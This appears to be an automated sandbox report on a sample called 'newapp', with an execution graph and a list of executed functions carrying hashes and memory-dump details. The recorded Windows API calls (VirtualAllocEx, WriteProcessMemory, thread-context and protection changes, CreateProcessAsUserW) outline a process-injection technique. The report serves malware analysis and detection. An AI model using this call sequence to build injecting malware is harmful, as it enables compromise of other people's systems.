                                                          execution_graph 70988 810b890 70989 810b8d5 Wow64GetThreadContext 70988->70989 70991 810b91d 70989->70991 70992 8118890 70993 81188a4 70992->70993 70994 811891d 70993->70994 71003 8100a70 70993->71003 71007 81013ed 70993->71007 71011 810125c 70993->71011 71015 810090d 70993->71015 71019 8101207 70993->71019 71023 810075b 70993->71023 71027 8100a11 70993->71027 71032 8102197 70993->71032 71004 8100a83 71003->71004 71036 81026b1 71003->71036 71039 81026b8 71003->71039 71009 81026b1 VirtualProtect 71007->71009 71010 81026b8 VirtualProtect 71007->71010 71008 8101407 71009->71008 71010->71008 71013 81026b1 VirtualProtect 71011->71013 71014 81026b8 VirtualProtect 71011->71014 71012 810129a 71013->71012 71014->71012 71017 81026b1 VirtualProtect 71015->71017 71018 81026b8 VirtualProtect 71015->71018 71016 8100931 71017->71016 71018->71016 71021 81026b1 VirtualProtect 71019->71021 71022 81026b8 VirtualProtect 71019->71022 71020 810121b 71021->71020 71022->71020 71025 81026b1 VirtualProtect 71023->71025 71026 81026b8 VirtualProtect 71023->71026 71024 810076c 71025->71024 71026->71024 71028 8100a06 71027->71028 71028->71027 71030 81026b1 VirtualProtect 71028->71030 71031 81026b8 VirtualProtect 71028->71031 71029 8100a83 71030->71029 71031->71029 71034 81026b1 VirtualProtect 71032->71034 71035 81026b8 VirtualProtect 71032->71035 71033 81021a8 71034->71033 71035->71033 71037 8102700 VirtualProtect 71036->71037 71038 810273a 71037->71038 71038->71004 71040 8102700 VirtualProtect 71039->71040 71041 810273a 71040->71041 71041->71004 71060 637fef0 71063 62207e0 71060->71063 71061 637ff03 71065 62207eb 71063->71065 71064 6226621 71064->71061 71065->71064 71068 622b118 71065->71068 71073 622b108 71065->71073 71070 622b139 71068->71070 71069 622b15d 71069->71064 71070->71069 71078 622b2b9 71070->71078 71082 622b2c8 71070->71082 71074 622b139 71073->71074 71075 622b15d 71074->71075 71076 622b2c8 CreateWindowExW 71074->71076 71077 622b2b9 CreateWindowExW 71074->71077 71075->71064 71076->71075 71077->71075 71080 622b2d5 71078->71080 71079 622b30f 71079->71069 71080->71079 71086 6229e30 71080->71086 71083 622b2d5 71082->71083 71084 622b30f 71083->71084 71085 6229e30 CreateWindowExW 71083->71085 71084->71069 71085->71084 71087 6229e3b 71086->71087 71089 622c028 71087->71089 71090 622b634 71087->71090 71089->71089 71091 622b63f 71090->71091 71092 62207e0 CreateWindowExW 71091->71092 71093 622c097 71092->71093 71097 622d9d8 71093->71097 71102 622d9f0 71093->71102 71094 622c0d1 71094->71089 71099 622d9e2 71097->71099 71098 622da2d 71098->71094 71099->71098 71108 622eb28 71099->71108 71112 622eb17 71099->71112 71104 622da21 71102->71104 71105 622db22 71102->71105 71103 622da2d 71103->71094 71104->71103 71106 622eb17 CreateWindowExW 71104->71106 71107 622eb28 CreateWindowExW 71104->71107 71105->71094 71106->71105 71107->71105 71109 622eb53 71108->71109 71110 622ec02 71109->71110 71116 622f9f0 71109->71116 71114 622eb22 71112->71114 71113 622ec02 71113->71113 71114->71113 71115 622f9f0 CreateWindowExW 71114->71115 71115->71113 71117 622fa06 71116->71117 71118 622fa3e CreateWindowExW 71116->71118 71117->71110 71120 622fb74 71118->71120 71121 6377570 71122 6377592 71121->71122 71123 62207e0 CreateWindowExW 71121->71123 71123->71122 71049 810c2b8 71050 810c300 WriteProcessMemory 71049->71050 71052 810c357 71050->71052 71140 810bf78 71141 810bfb8 VirtualAllocEx 71140->71141 71143 810bff5 71141->71143 71124 62209e8 71125 6220a0d 71124->71125 71128 6220690 71125->71128 71127 6220a1e 71129 622069b 71128->71129 71132 6220780 71129->71132 71131 62232fd 71131->71127 71133 622078b 71132->71133 71136 62207b0 71133->71136 71135 62233da 71135->71131 71137 62207bb 71136->71137 71138 62207e0 CreateWindowExW 71137->71138 71139 62234dc 71138->71139 71139->71135 71053 77dacd0 71054 77dad16 DeleteFileW 71053->71054 71056 77dad4f 71054->71056 71042 622ba30 71043 622ba92 DuplicateHandle 71042->71043 71044 622bac6 71043->71044 71144 81049e2 71145 8104a23 71144->71145 71146 8104e51 71145->71146 71149 8107800 71145->71149 71154 810761d 71145->71154 71151 8107827 71149->71151 71150 81078eb 71150->71145 71151->71150 71159 8109b88 71151->71159 71163 8109b87 71151->71163 71155 8107624 71154->71155 71156 81078eb 71155->71156 71157 8109b87 CreateProcessAsUserW 71155->71157 71158 8109b88 CreateProcessAsUserW 71155->71158 71156->71145 71157->71155 71158->71155 71160 8109c07 CreateProcessAsUserW 71159->71160 71162 8109d08 71160->71162 71164 8109b88 CreateProcessAsUserW 71163->71164 71166 8109d08 71164->71166 71166->71166 71167 6229050 71170 6229148 71167->71170 71168 622905f 71171 622917c 71170->71171 71172 6229159 71170->71172 71171->71168 71172->71171 71173 6229380 GetModuleHandleW 71172->71173 71174 62293ad 71173->71174 71174->71168 71175 63722c0 71176 63722e3 71175->71176 71178 637231e 71176->71178 71179 6372332 71178->71179 71181 6372339 71178->71181 71180 637238a CallWindowProcW 71179->71180 71179->71181 71180->71181 71045 810ca08 71046 810ca50 VirtualProtectEx 71045->71046 71048 810ca8e 71046->71048 71057 8119928 71058 8119970 VirtualProtect 71057->71058 71059 81199aa 71058->71059

                                                          Executed Functions

                                                          Function 02F686F9 Relevance: 12.2, Strings: 9, Instructions: 911COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2574293005.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2f60000_newapp.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (o_q$(o_q$(o_q$(o_q$(o_q$(o_q$(o_q$,cq$,cq
                                                          • API String ID: 0-2006360050
                                                          • Opcode ID: e233c28006e0bbee007404682d69032a55d792f6acbacee53345869adab7cbac
                                                          • Instruction ID: d49913f1e694c91e1e8877d0c1c80e0ece413b7323d4ad2321c5f9cd9d75d90f
                                                          • Opcode Fuzzy Hash: e233c28006e0bbee007404682d69032a55d792f6acbacee53345869adab7cbac
                                                          • Instruction Fuzzy Hash: 0B826D31A00209DFCB15CF68D998AAEBBF2FF88394F158559E506EB2A5D730EC45CB50
                                                          Function 078921E5 Relevance: 5.5, Instructions: 5512COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2055 78921e5-7892447 2084 78944ad-789475b 2055->2084 2085 789244d-7893160 2055->2085 2152 7894761-7895638 2084->2152 2153 7895640-78965da 2084->2153 2483 78934e0-78944a5 2085->2483 2484 7893166-78934d8 2085->2484 2152->2153 2714 7896960-7896973 2153->2714 2715 78965e0-7896958 2153->2715 2483->2084 2484->2483 2720 7896979-7896fad 2714->2720 2721 7896fb5-7897e47 2714->2721 2715->2714 2720->2721 3103 7897e47 call 78998bd 2721->3103 3104 7897e47 call 78998cc 2721->3104 3101 7897e4d-7897e54 3103->3101 3104->3101
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2607359314.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_7890000_newapp.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a104c7ba003bee0339c2e89c4f935d6f5e892394d6a67e6d6025d989b97dc430
                                                          • Instruction ID: ecfb403a681c3e76d0b93f4637b3612574f015b1e2563cb42eeca34d43910776
                                                          • Opcode Fuzzy Hash: a104c7ba003bee0339c2e89c4f935d6f5e892394d6a67e6d6025d989b97dc430
                                                          • Instruction Fuzzy Hash: 78B31670E112198FCB68EF39EA896ACBBB2FB89300F4045E9D049A7350DB385D95DF51
                                                          Function 07892210 Relevance: 5.5, Instructions: 5499COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3105 7892210-7892447 3133 78944ad-789475b 3105->3133 3134 789244d-7893160 3105->3134 3201 7894761-7895638 3133->3201 3202 7895640-78965da 3133->3202 3532 78934e0-78944a5 3134->3532 3533 7893166-78934d8 3134->3533 3201->3202 3763 7896960-7896973 3202->3763 3764 78965e0-7896958 3202->3764 3532->3133 3533->3532 3769 7896979-7896fad 3763->3769 3770 7896fb5-7897e47 3763->3770 3764->3763 3769->3770 4152 7897e47 call 78998bd 3770->4152 4153 7897e47 call 78998cc 3770->4153 4150 7897e4d-7897e54 4152->4150 4153->4150
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2607359314.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_7890000_newapp.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c51ff33ff7037a381ad5c04966485bb16a05df2fba986aa28391f8318dd429d2
                                                          • Instruction ID: 689163c4cec7206942973a7f9235fae571487cd6d03c97a4e69a14ab42276e42
                                                          • Opcode Fuzzy Hash: c51ff33ff7037a381ad5c04966485bb16a05df2fba986aa28391f8318dd429d2
                                                          • Instruction Fuzzy Hash: A3B31670E112198FCB68EF39EA896ACBBB2FB89300F4045E9D049A7350DB385D95DF51
                                                          Function 02F64B70 Relevance: 4.0, Strings: 3, Instructions: 266COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6385 2f64b70-2f64b8d 6386 2f64b96-2f64ba6 6385->6386 6387 2f64b8f-2f64b91 6385->6387 6389 2f64bad-2f64bbd 6386->6389 6390 2f64ba8 6386->6390 6388 2f64e35-2f64e3c 6387->6388 6392 2f64bc3-2f64bd1 6389->6392 6393 2f64e1c-2f64e2a 6389->6393 6390->6388 6396 2f64bd7 6392->6396 6397 2f64e3d-2f64eb6 6392->6397 6393->6397 6398 2f64e2c-2f64e30 call 2f601b8 6393->6398 6396->6397 6400 2f64d76-2f64d9c 6396->6400 6401 2f64cb4-2f64cd5 6396->6401 6402 2f64d34-2f64d71 6396->6402 6403 2f64bf5-2f64c16 6396->6403 6404 2f64e10-2f64e1a 6396->6404 6405 2f64bde-2f64bf0 6396->6405 6406 2f64cda-2f64d02 6396->6406 6407 2f64c1b-2f64c3d 6396->6407 6408 2f64d07-2f64d2f 6396->6408 6409 2f64c42-2f64c63 6396->6409 6410 2f64da1-2f64dcd 6396->6410 6411 2f64c8e-2f64caf 6396->6411 6412 2f64dcf-2f64dea call 2f601a8 6396->6412 6413 2f64dec-2f64e0e 6396->6413 6414 2f64c68-2f64c89 6396->6414 6398->6388 6400->6388 6401->6388 6402->6388 6403->6388 6404->6388 6405->6388 6406->6388 6407->6388 6408->6388 6409->6388 6410->6388 6411->6388 6412->6388 6413->6388 6414->6388
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2574293005.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2f60000_newapp.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: U$Xcq$$_q
                                                          • API String ID: 0-3790087148
                                                          • Opcode ID: dca7f696df6ed107b3c4aca485d0a608f5d17227a67038829b54522ba9896923
                                                          • Instruction ID: 1b52ad63723cba96fbf512d4efc2636d7bf81a87da2dfc06b06755db7bd6213d
                                                          • Opcode Fuzzy Hash: dca7f696df6ed107b3c4aca485d0a608f5d17227a67038829b54522ba9896923
                                                          • Instruction Fuzzy Hash: C891A235B002189BCB69AFB4945867F7BB7BFC8740B55842DE506EB388CE349C069791
                                                          Function 07890EF4 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2607359314.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_7890000_newapp.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$TJdq$Te_q
                                                          • API String ID: 0-4144917423
                                                          • Opcode ID: 3624034df1b2d8ea2ffd03bd7c5bcbeb1a2f1112781dc518540be1bf8bcc2c6b
                                                          • Instruction ID: eb4d09dd3e0da166a3af8d42d61e389eb38fc3d526187a3fa4a5833a63ecec67
                                                          • Opcode Fuzzy Hash: 3624034df1b2d8ea2ffd03bd7c5bcbeb1a2f1112781dc518540be1bf8bcc2c6b
                                                          • Instruction Fuzzy Hash: A941889260E3D24FD7035734983465A7FB1AF97114B1E41DBD186CF6E3D9298C0AC3A6
                                                          Function 06374AC8 Relevance: 3.2, APIs: 2, Instructions: 182COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemMetrics.USER32(00000023), ref: 06374A88
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2604942022.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_6370000_newapp.jbxd
                                                          Similarity
                                                          • API ID: MetricsSystem
                                                          • String ID:
                                                          • API String ID: 4116985748-0
                                                          • Opcode ID: 4277153f9d766852dd155bede35f5d17f9d532de87c11202d8229eaa5442ce53
                                                          • Instruction ID: e23d9f4de6f8b8b48e0425b5883e29469b54a90fdbb14a18c82e333d621dc19a
                                                          • Opcode Fuzzy Hash: 4277153f9d766852dd155bede35f5d17f9d532de87c11202d8229eaa5442ce53
                                                          • Instruction Fuzzy Hash: 91711674A10209EFCB94CF69D888AAEBBF5FF48321F114459E905AB361D735E885CF90
                                                          Function 07891000 Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2607359314.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_7890000_newapp.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TJdq$Te_q
                                                          • API String ID: 0-3934155944
                                                          • Opcode ID: 7d9c11c9a39f7d2f4f1d093d0c228defd3585a6614a85a412c683ad772909a7a
                                                          • Instruction ID: 923a3f0614e3d6a3b89206603686bce1ba4a4df91a4fac6cd244036f9f4bd852
                                                          • Opcode Fuzzy Hash: 7d9c11c9a39f7d2f4f1d093d0c228defd3585a6614a85a412c683ad772909a7a
                                                          • Instruction Fuzzy Hash: 13F096327100215FCA48A77DB46893E77DFBFCDA203154459E90ACF3A5CE65DC0683AA
                                                          Function 078906C0 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2607359314.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_7890000_newapp.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te_q
                                                          • API String ID: 0-823545363
                                                          • Opcode ID: cb115131fac02f96ede73d099d98d22d6da2e7c336853bbd9413c879e9e2fd7d
                                                          • Instruction ID: c7d2328a3447273a026bc7fa7c62422618048596e9ca235767c12c54ae12cae5
                                                          • Opcode Fuzzy Hash: cb115131fac02f96ede73d099d98d22d6da2e7c336853bbd9413c879e9e2fd7d
                                                          • Instruction Fuzzy Hash: FC127D71A102258BC744FFB9D98966DBBF6FB88704F808429D489E7390DF38AC06C752
                                                          Function 078906D0 Relevance: 1.8, Strings: 1, Instructions: 526COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2607359314.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_7890000_newapp.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te_q
                                                          • API String ID: 0-823545363
                                                          • Opcode ID: d163a59679d5557ca14dd94d27cd73073a6babd2dc4a4ec0e7e24c0b4ba9f21a
                                                          • Instruction ID: e1507c824a0c029a69aebe3a846afbb00702205066b14a7d1ae96a82b5cdd168
                                                          • Opcode Fuzzy Hash: d163a59679d5557ca14dd94d27cd73073a6babd2dc4a4ec0e7e24c0b4ba9f21a
                                                          • Instruction Fuzzy Hash: 29126C71B102258BC744BFB9D98966DBBF6FB88704F808469D489E7394DF38AC06C752
                                                          Function 06229148 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0622939E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2604458509.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_6220000_newapp.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: e5fd0d679ba6f4990c1675fb38a33ab7ad0debf11df1791f0b6efdff59114e97
                                                          • Instruction ID: d1fe8b2c4310595b4994d4f91b61e341e5c28d4b83d187e2324233ed319eabb8
                                                          • Opcode Fuzzy Hash: e5fd0d679ba6f4990c1675fb38a33ab7ad0debf11df1791f0b6efdff59114e97
                                                          • Instruction Fuzzy Hash: 068139B0A20B169FD7A4DF6AD54475ABBF1BF88300F008A2DD84AD7A50D775E489CB90
                                                          Function 08109B87 Relevance: 1.7, APIs: 1, Instructions: 165processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 08109CF3
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2608804471.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_8100000_newapp.jbxd
                                                          Similarity
                                                          • API ID: CreateProcessUser
                                                          • String ID:
                                                          • API String ID: 2217836671-0
                                                          • Opcode ID: 7d6a92c51d2f94ffcb10564c0716bddb7c2ae0161c9c39e6daba44c49a1a231b
                                                          • Instruction ID: 9e6eba63d1b2c622c9b169b3bf2bd0ed728065863f4448b41de8d2fdfce699c5
                                                          • Opcode Fuzzy Hash: 7d6a92c51d2f94ffcb10564c0716bddb7c2ae0161c9c39e6daba44c49a1a231b
                                                          • Instruction Fuzzy Hash: 9551F7B1D00269DFDB24CF99C950BDDBBB5BF48314F0480AAE918B7251DB719A85CFA0
                                                          Function 08109B88 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 08109CF3
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2608804471.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_8100000_newapp.jbxd
                                                          Similarity
                                                          • API ID: CreateProcessUser
                                                          • String ID:
                                                          • API String ID: 2217836671-0
                                                          • Opcode ID: 51dece8189c2548c001c957f98f0ce50357748caf605dba893dd2ed1fbb9606b
                                                          • Instruction ID: f8df62384ddc4425f78f0735f305e2f40821903c1f209c528284a3c248768880
                                                          • Opcode Fuzzy Hash: 51dece8189c2548c001c957f98f0ce50357748caf605dba893dd2ed1fbb9606b
                                                          • Instruction Fuzzy Hash: 4151F7B1D00269DFDB24CF99C950BDDBBB5BF48314F0480AAE918B7251DB719A85CFA0
                                                          Function 0622F9F0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0622FB62
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2604458509.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_6220000_newapp.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 2190d4af19e41652d4b710829c37b0e93902ce581f018a3e5222e9e69a4f6c33
                                                          • Instruction ID: 3823c21b86951d48dd87e60ad7da0eced8ca96445983de1d6dc61bcec5d92908
                                                          • Opcode Fuzzy Hash: 2190d4af19e41652d4b710829c37b0e93902ce581f018a3e5222e9e69a4f6c33
                                                          • Instruction Fuzzy Hash: 9751F3B1C1025AAFCF11CFA9C990ADDBFB5BF48310F15815AE818AB221D7759855CF90
                                                          Function 0622FA50 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0622FB62
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2604458509.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_6220000_newapp.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 3f3119fca29ec7865b3b4a475432dc40ca5db8a9dab82f47cfab9655aafa6c78
                                                          • Instruction ID: 87d410523d3a4a7e46aa4c312436e15020249cc4f3bdb2b5d3834ceb1dda7296
                                                          • Opcode Fuzzy Hash: 3f3119fca29ec7865b3b4a475432dc40ca5db8a9dab82f47cfab9655aafa6c78
                                                          • Instruction Fuzzy Hash: 6A41CFB1D10319EFDB14CFAAC994ADEBBB5BF48310F24812AE818AB210D7749845CF90
                                                          Function 0637231E Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 063723B1
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2604942022.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_6370000_newapp.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 6f6246ea9c9d7547521747f5c71dd4829dfb484a952a156888c253c0c24b798c
                                                          • Instruction ID: 685bc323ffc2e0eff6b846cae90793e124c302a810e290b2d883b9a697cacec3
                                                          • Opcode Fuzzy Hash: 6f6246ea9c9d7547521747f5c71dd4829dfb484a952a156888c253c0c24b798c
                                                          • Instruction Fuzzy Hash: 4E3169B9A00305CFDB54CF59C848AAABBF5FF88314F25C459E418AB321D334A985CFA0
                                                          Function 0810C2B8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0810C348
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2608804471.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_8100000_newapp.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: ffc176d79a20a5d844b80a6e6f1e9684860916169ada03530d8138f22d719a6b
                                                          • Instruction ID: 60c674050004167fc861edc6ce409306579d5705faf24c4892af253ec40bd6f2
                                                          • Opcode Fuzzy Hash: ffc176d79a20a5d844b80a6e6f1e9684860916169ada03530d8138f22d719a6b
                                                          • Instruction Fuzzy Hash: 362146719003099FCB10CFA9C981BDEBBF5FF48310F10842AE919A7240C7789944DFA0
                                                          Function 0622BA28 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0622BAB7
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2604458509.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_6220000_newapp.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 3a65b4cf78cacdc2eafedff2db8ff2d40d619cd42a0c03a91a9d24a5904e6d99
                                                          • Instruction ID: 6452a0d1dc432fa5e119bcd749bcdded20a736ad2b4d745c6b51a85742353583
                                                          • Opcode Fuzzy Hash: 3a65b4cf78cacdc2eafedff2db8ff2d40d619cd42a0c03a91a9d24a5904e6d99
                                                          • Instruction Fuzzy Hash: E62103B5C10209EFDB10CFA9D584AEEBBF4FB18314F14841AE958A3310D374A944CFA1
                                                          Function 0810B890 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0810B90E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2608804471.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_8100000_newapp.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 24744c57c9d8f6b4acd0f461112762f659ae45ff87feff79599ebc437d48ada6
                                                          • Instruction ID: 38420f1491f2b3395c45f3c4026dbba3d1a8a0ea9280e9324e6444b7c7b8aad9
                                                          • Opcode Fuzzy Hash: 24744c57c9d8f6b4acd0f461112762f659ae45ff87feff79599ebc437d48ada6
                                                          • Instruction Fuzzy Hash: 6A2134B1D042099FDB10DFAAC8857EEBBF4EF88324F10842ED419A7240C778A945CFA0
                                                          Function 077DACCD Relevance: 1.6, APIs: 1, Instructions: 62fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(00000000), ref: 077DAD40
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2606887778.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_77d0000_newapp.jbxd
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: ce03c85ab7928a1dfdd8b665cfaf2df90a6a5dfa3829e8ff2bb6e38dec3e6564
                                                          • Instruction ID: 24f252cfaf81ed594a9f697b4c7b740b2895adadfde8b7c9e41d19c27f6aef75
                                                          • Opcode Fuzzy Hash: ce03c85ab7928a1dfdd8b665cfaf2df90a6a5dfa3829e8ff2bb6e38dec3e6564
                                                          • Instruction Fuzzy Hash: 362133B1C0061A9BCB10DF9AD445AEEFBB4BB49320F15862AD818A7244D338A945CFA5
                                                          Function 0622BA30 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0622BAB7
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2604458509.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_6220000_newapp.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 580765c4d5c2a4a3d5d330f0439e3340acf5dc0eeeb70d803b0579bc843d10e5
                                                          • Instruction ID: d01a2e802a6e2b8873e9d2359a3d69334e49024c355e21ea854cd8bfed25524a
                                                          • Opcode Fuzzy Hash: 580765c4d5c2a4a3d5d330f0439e3340acf5dc0eeeb70d803b0579bc843d10e5
                                                          • Instruction Fuzzy Hash: E821E4B5D10209AFDB10CFAAD984ADEBBF8FB48310F14801AE918A3310D374A944CFA1
                                                          Function 0810CA08 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 0810CA7F
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2608804471.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_8100000_newapp.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 944196f7d34e252c0b066f4e77e4b87167acce94f216b3fcce4049af31495cbf
                                                          • Instruction ID: 34f4599ff1e44d6a88c085450d298f7729fe16e6f1051ddd637ad0f14488f3d3
                                                          • Opcode Fuzzy Hash: 944196f7d34e252c0b066f4e77e4b87167acce94f216b3fcce4049af31495cbf
                                                          • Instruction Fuzzy Hash: 112147B1C002099FCB10DFAAC845AEEFBF4EF48320F10842EE519A7250D7799945CFA1
